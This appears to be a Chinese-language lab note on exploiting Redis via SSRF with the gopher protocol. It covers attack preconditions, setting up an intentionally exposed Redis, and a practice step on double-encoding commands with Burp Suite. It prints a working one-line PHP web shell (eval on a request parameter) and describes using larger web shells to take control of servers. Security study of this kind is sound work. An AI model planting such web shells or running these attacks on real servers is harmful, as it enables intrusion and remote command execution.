一.gopher协议
gopher协议是在www出现之前在Internet上最主要的信息检索工具,也是信息查找系统,将Internet上的文件构成索引,将用户从一端带到另一端。
gopher协议的限制:php版本高于5.3 java的jdk版本小于1.7
gopher协议作用:可以向内网输送文件
gopher协议格式:URL:gopher://\<host>\<port>/\<gopher-path>
二.什么是Redis
redis是一款内存高速缓存的数据库
0.0.0.0:6379 0.0.0.0表示任何ip地址都可以访问 默认开启保护模式 默认没有密码
攻击redis数据库的条件:redis.config配置文件中没有密码或是弱口令,关闭保护模式,#127.0.0.1
Redis搭建:
1.远程下载redis安装包: wget http://download.redis.io/releases/redis-4.0.10.tar.gz
2.下载后解压:tar -zxf redis-4.0.10.tar.gz
3.解压后编译:
cd ./redis-4.0.10 #进入当前文件
sudo make install #下载编译包
sudo make #进行编译
4.建立快捷模式
cd src cp ./redis-server /bin
5.将redis配置文件复制到/etc目录下
cd ../
cp /redis.conf /etc
6.使用命令启动redis
sudo redis-server /etc/redis.conf
7.查看是否运行成功
ps -aux | grep redis
8.配置redis
sudo vim /etc/redis.conf #127.0.0.1改为0.0.0.0 保护模式yes改为no,保存退出
然后ctrl+c退出redis再重启 redis-server /etc/redis.conf
9.使用reids-cli远程连接,即可成功
redis-cli -h ip地址 -p 6379
三.知识扩展
1.在kali上下载好小p并搭建网站
2.一句话mu ma也叫小马,<?php @eval($_REQUEST['cmd']); ?>
cmd内写什么都可以,主要是自己知道
例如:<?php @eval($_REQUEST['ya']); ?>
空白才是正常的
phpinfo可以把很多网站信息展示出来
system('dir'); 可以带出文件信息
3.大马可以让别人服务器变得像自己服务器
四.实践
使用工具,将命令进行编码,因为url会进行解码,所以运用bp进行二次编码,然后将命令放入url中